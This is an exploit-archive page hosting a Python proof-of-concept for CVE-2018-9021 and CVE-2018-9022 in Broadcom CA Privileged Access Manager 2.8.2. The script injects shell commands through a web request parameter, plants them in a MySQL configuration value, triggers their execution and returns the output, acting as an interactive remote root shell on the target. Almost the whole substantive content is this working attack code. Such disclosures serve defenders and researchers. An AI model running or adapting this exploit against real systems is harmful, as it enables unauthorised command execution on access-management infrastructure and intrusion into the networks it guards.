Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution: Posted Dec 5, 2019; Authored by Peter Lapp; Broadcom CA Privileged Access Manager version 2.8.2 suffers from a remote command execution vulnerability.; tags | exploit, remote; advisories | CVE-2018-9021, CVE-2018-9022; SHA-256 | b57c9d05247aeec50f84b6f1d59466d0e7e19320e75ac48a4c045bb8ffba4b6b; Download | Favorite | View

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
# Tested on: v2.8.2

import urllib2
import urllib
import ssl
import sys
import json
import base64


ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def send_command(ip, cmd):
    cmd = urllib.quote_plus(cmd)
    url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
    request = urllib2.Request(url, None)
    response = urllib2.urlopen(request, context=ctx)
    result = json.load(response)
    return result['responseData']

def get_db_value():
    cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
    db_value = send_command(ip,cmd)
    db_value = db_value.split('\n')[1]
    return db_value
    
def encode_payload(cmd):
    sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    return cmd
    
def restore_sql(value):
    sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    send_command(ip,cmd)
    
def main():
    print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''
  
    if len(sys.argv) != 2:
        print "Usage: xceedium_rce.py <target ip>"
        sys.exit()

    global ip
    ip = sys.argv[1]
    print 'Enter commands below. Type exit to quit'
  
    while True:
        cmd = raw_input('# ')
        if cmd == "exit":
            sys.exit()
        orig_value = get_db_value()
        payload = encode_payload(cmd)
        send_command(ip, payload)
        send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
        output = send_command(ip, 'cat /tmp/output')
        print output
        restore_sql(orig_value)
  


if __name__ == "__main__":
    main()

Top Authors In Last 30 Days

Red Hat 247 files
Ubuntu 91 files
Gentoo 31 files
Debian 17 files
indoushka 12 files
tmrswrr 8 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
bRpsd 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,465)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,354)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,678)
UNIX (9,430)
UnixWare (187)
Windows (6,667)
Other

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

Share This

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems